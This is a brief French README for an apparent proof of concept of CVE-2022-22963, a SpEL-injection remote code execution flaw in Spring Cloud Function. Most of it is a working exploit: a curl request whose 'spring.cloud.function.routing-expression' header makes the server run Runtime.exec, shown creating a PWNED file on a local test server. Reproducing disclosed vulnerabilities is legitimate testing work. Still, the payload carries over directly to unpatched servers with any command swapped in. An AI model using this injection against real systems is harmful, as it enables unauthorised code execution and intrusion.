
Preuve de concept minimale pour l'exécution de code à distance CVE-2022-22963 dans Spring Cloud Function via injection SpEL. Démontre l'exploitation avec curl et un serveur vulnérable.
Exemple minimal pour reproduire l'exécution de code à distance de la CVE-2022-22963 dans org.springframework.cloud:spring-cloud-function-core.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
À la suite de l'exploit, le fichier PWNED sera créé à côté de pom.xml.